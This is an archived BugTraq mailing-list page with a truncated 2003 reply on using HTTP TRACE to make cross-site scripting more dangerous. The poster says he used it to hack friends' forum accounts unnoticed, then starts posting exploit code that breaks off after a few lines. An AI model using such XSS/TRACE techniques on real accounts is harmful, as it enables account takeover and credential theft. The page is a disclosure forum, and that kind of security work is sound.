Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs
BugTraq
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
 
Re: TRACE used to increase the dangerous of XSS. Jan 24 2003 01:08AM
Phrack (security fooyu com)
It's really a terrible security hole. Using this method, I have hacked some BBS account of my friends. If you do it properly, it wouldn't be noticed by victim. The following is my code:

<script type="text/javascript">

function xssDomainTraceRequest(){

var exampleCode = "var xmlHttp = new...

[ more ]  





 

Privacy Statement
Copyright 2009, SecurityFocus